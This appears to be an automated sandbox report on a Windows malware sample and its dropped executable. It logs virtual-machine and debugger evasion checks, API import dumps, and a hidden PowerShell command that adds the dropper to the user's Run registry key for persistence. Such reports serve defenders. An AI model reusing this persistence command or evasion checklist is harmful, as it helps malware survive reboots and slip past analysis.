                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: vmtoolsd.exe vmtoolsd.exe vmtoolsd.exe 0_2_00EF2380
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF23800_2_00EF2380
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009522C07_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009522C010_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                    Source: C:\Users\user\Desktop\Nepomuk.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-38124
                    Source: C:\Users\user\Desktop\Nepomuk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\Nepomuk.exeSystem information queried: FirmwareTableInformation
                    Source: Nepomuk.exe, NrEXDJiACHo.exe.7.dr, T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: PROCMON.EXE
                    Source: Nepomuk.exe, NrEXDJiACHo.exe.7.dr, T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: MPVMP32ENTRYNTQUERYINFORMATIONPROCESSCOINITIALIZESECURITYWRITEPROCESSMEMORYFREELIBRARYLSAOPENPOLICYAUDITQUERYSYSTEMPOLICYFLASHWINDOWEXADJUSTWINDOWRECTEXGLOBALMEMORYSTATUSEXCOINITIALIZEEXVIRTUALALLOCEXDESTROYWINDOWSHOWWINDOWANIMATEWINDOWUPDATEWINDOWWSARECVCRYPTENCRYPTCRYPTDECRYPTUIARAISEAUTOMATIONEVENTCONTINUEDEBUGEVENTISDEBUGGERPRESENTCHECKREMOTEDEBUGGERPRESENTCOIMPERSONATECLIENTCOSETPROXYBLANKETWAITFORSINGLEOBJECTASSIGNPROCESSTOJOBOBJECTGETWINDOWRECTGETSYSTEMPOWERSTATUSQUERYSERVICESTATUSSETSERVICESTATUSSETFOCUSGETPROCADDRESSEXITPROCESSOPENPROCESSDEBUGACTIVEPROCESSSETWINDOWPOSGETCURSORPOSADJUSTTOKENPRIVILEGESGETSYSTEMMETRICSGETLASTERRORQUERYPERFORMANCECOUNTERSETUNHANDLEDEXCEPTIONFILTERDRAWMENUBARWSASTARTUPWSACLEANUPBEEPGETNATIVESYSTEMINFORAISEEXCEPTIONWOW64DISABLEWOW64FSREDIRECTIONINITIALIZECRITICALSECTIONOPENPROCESSTOKENWSAIOCTLDEVICEIOCONTROLNTDLL.DLLSBIEDLL.DLLSETSECURITYDESCRIPTORDACLWINDOWSCREATESTRINGUIACLIENTSARELISTENINGROINITIALIZEVMTOOLSD.EXEGETKEYSTATEGETASYNCKEYSTATESETTHREADEXECUTIONSTATESETSUSPENDSTATESETCAPTUREGETSYSTEMTIMEGETHOSTBYNAMEWRITEFILEREADFILETRANSLATEMESSAGEVIRTUALFREELOCALFREEGETERRORMODEROACTIVATEINSTANCECOCREATEINSTANCECONTROLSERVICEEMPTYCLIPBOARDOPENCLIPBOARDUIAHOSTPROVIDERFROMHWNDBINDCREATEREMOTETHREADCREATETHREADGETCURRENTPROCESSIDHEAPALLOCCOTASKMEMALLOCVIRTUALALLOCGLOBALALLOCISPROCESSINJOBCRYPTPROTECTDATASETCLIPBOARDDATALSTRCPYWREGDELETEKEYWMESSAGEBOXWCREATEMUTEXWLOADLIBRARYEXWREGOPENKEYEXWCREATEWINDOWEXWFINDWINDOWEXWGETVERSIONEXWREGQUERYVALUEEXWREGSETVALUEEXWCRYPTACQUIRECONTEXTWDRAWTEXTWCREATEEVENTWCREATEJOBOBJECTWLSTRCATWCREATEPROCESSWLOADCURSORWLOGONUSERWREGISTERSERVICECTRLHANDLERWSTARTSERVICECTRLDISPATCHERWOPENSCMANAGERWDIALOGBOXPARAMWSHGETFOLDERPATHWOUTPUTDEBUGSTRINGWCREATEFILEMAPPINGWWSPRINTFWLOOKUPPRIVILEGEVALUEWSHELLEXECUTEWGETCOMPUTERNAMEWFINDFIRSTFILEWENCRYPTFILEWDECRYPTFILEWDELETEFILEWCREATEFILEWPOSTMES
SAGEWGETMESSAGEWFORMATMESSAGEWPEEKMESSAGEWDISPATCHMESSAGEWSENDMESSAGEWSTARTSERVICEWQUERYDOSDEVICEWCREDREADWSYSTEMFUNCTION036GETTICKCOUNT64
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeBinary or memory string: SBIEDLL.DLL
                    Source: Nepomuk.exe, NrEXDJiACHo.exe.7.dr, T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: XENSERVICE.EXE
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,Get
GestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNativeSystemInfo,Gl0_2_00EF2610
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2594
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1108
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2948
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 527
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2490
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1121
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchIn
putHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exe TID: 7232Thread sleep time: -180000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 2594 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep count: 1108 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 2948 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712Thread sleep count: 527 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1728Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 2490 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 1121 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 832Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5664Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Nepomuk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2380 GetSystemInfo,GlobalMemoryStatusEx,GetTickCount,GetTickCount,Sleep,GetTickCount,CreateToolhelp32Snapshot,Process32First,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Process32Next,CloseHandle,0_2_00EF2380
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeBinary or memory string: vmtoolsd.exe
                    Source: Nepomuk.exe, 00000000.00000003.1339975888.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391450964.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1289528214.000000000169F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
                    Source: Nepomuk.exe, 00000000.00000003.1339975888.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391450964.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1289528214.000000000169F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Nepomuk.exe, 00000000.00000003.1471118429.000000000164A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472124521.000000000164A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: Nepomuk.exe, 00000000.00000002.1471763541.0000000000F4F000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: vmtoolsd.execuckoo_svc.exe
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: MpVmp32EntryNtQueryInformationProcessCoInitializeSecurityWriteProcessMemoryFreeLibraryLsaOpenPolicyAuditQuerySystemPolicyFlashWindowExAdjustWindowRectExGlobalMemoryStatusExCoInitializeExVirtualAllocExDestroyWindowShowWindowAnimateWindowUpdateWindowWSARecvCryptEncryptCryptDecryptUiaRaiseAutomationEventContinueDebugEventIsDebuggerPresentCheckRemoteDebuggerPresentCoImpersonateClientCoSetProxyBlanketWaitForSingleObjectAssignProcessToJobObjectGetWindowRectGetSystemPowerStatusQueryServiceStatusSetServiceStatusSetFocusGetProcAddressExitProcessOpenProcessDebugActiveProcessSetWindowPosGetCursorPosAdjustTokenPrivilegesGetSystemMetricsGetLastErrorQueryPerformanceCounterSetUnhandledExceptionFilterDrawMenuBarWSAStartupWSACleanupBeepGetNativeSystemInfoRaiseExceptionWow64DisableWow64FsRedirectionInitializeCriticalSectionOpenProcessTokenWSAIoctlDeviceIoControlntdll.dllSbieDll.dllSetSecurityDescriptorDaclWindowsCreateStringUiaClientsAreListeningRoInitializevmtoolsd.exeGetKeyStateGetAsyncKeyStateSetThreadExecutionStateSetSuspendStateSetCaptureGetSystemTimegethostbynameWriteFileReadFileTranslateMessageVirtualFreeLocalFreeGetErrorModeRoActivateInstanceCoCreateInstanceControlServiceEmptyClipboardOpenClipboardUiaHostProviderFromHwndbindCreateRemoteThreadCreateThreadGetCurrentProcessIdHeapAllocCoTaskMemAllocVirtualAllocGlobalAllocIsProcessInJobCryptProtectDataSetClipboardDatalstrcpyWRegDeleteKeyWMessageBoxWCreateMutexWLoadLibraryExWRegOpenKeyExWCreateWindowExWFindWindowExWGetVersionExWRegQueryValueExWRegSetValueExWCryptAcquireContextWDrawTextWCreateEventWCreateJobObjectWlstrcatWCreateProcessWLoadCursorWLogonUserWRegisterServiceCtrlHandlerWStartServiceCtrlDispatcherWOpenSCManagerWDialogBoxParamWSHGetFolderPathWOutputDebugStringWCreateFileMappingWwsprintfWLookupPrivilegeValueWShellExecuteWGetComputerNameWFindFirstFileWEncryptFileWDecryptFileWDeleteFileWCreateFileWPostMessageWGetMessageWFormatMessageWPeekM
essageWDispatchMessageWSendMessageWStartServiceWQueryDosDeviceWCredReadWSystemFunction036GetTickCount64
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 00000007.00000002.2469642965.0000000001A3E000.00000004.00000020.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2469443459.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2469818940.00000000016F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Nepomuk.exe API call chain: ExitProcess graph end node graph_0-38069
                    Source: C:\Users\user\Desktop\Nepomuk.exe API call chain: ExitProcess graph end node graph_0-38096
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe API call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\Nepomuk.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03597FD0 LdrInitializeThunk,0_2_03597FD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchIn
putHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF16C0 mov eax, dword ptr fs:[00000030h]0_2_00EF16C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF12B0 mov eax, dword ptr fs:[00000030h]0_2_00EF12B0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2380 mov eax, dword ptr fs:[00000030h]0_2_00EF2380
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF1000 mov eax, dword ptr fs:[00000030h]0_2_00EF1000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015B0000 mov ecx, dword ptr fs:[00000030h]0_2_015B0000
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_015B0B20 mov eax, dword ptr fs:[00000030h]0_2_015B0B20
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009512B0 mov eax, dword ptr fs:[00000030h]7_2_009512B0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_00952550 mov eax, dword ptr fs:[00000030h]7_2_00952550
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009522C0 mov eax, dword ptr fs:[00000030h]7_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009516C0 mov eax, dword ptr fs:[00000030h]7_2_009516C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_00951000 mov eax, dword ptr fs:[00000030h]7_2_00951000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_018D0000 mov ecx, dword ptr fs:[00000030h]7_2_018D0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_018D0B20 mov eax, dword ptr fs:[00000030h]7_2_018D0B20
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009512B0 mov eax, dword ptr fs:[00000030h]10_2_009512B0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_00952550 mov eax, dword ptr fs:[00000030h]10_2_00952550
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009522C0 mov eax, dword ptr fs:[00000030h]10_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009516C0 mov eax, dword ptr fs:[00000030h]10_2_009516C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_00951000 mov eax, dword ptr fs:[00000030h]10_2_00951000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_032C0000 mov ecx, dword ptr fs:[00000030h]10_2_032C0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_032C0B20 mov eax, dword ptr fs:[00000030h]10_2_032C0B20
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 13_2_012E0000 mov ecx, dword ptr fs:[00000030h]13_2_012E0000
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 13_2_012E0B20 mov eax, dword ptr fs:[00000030h]13_2_012E0B20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF1000 ?DecoyAPICalls@@YAXXZ,GetSystemMetrics,GetModuleHandleW,GetTickCount,GetProcessHeap,GetModuleHandleW,GetProcAddress,GetCurrentProcess,VirtualQuery,0_2_00EF1000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe\" }"
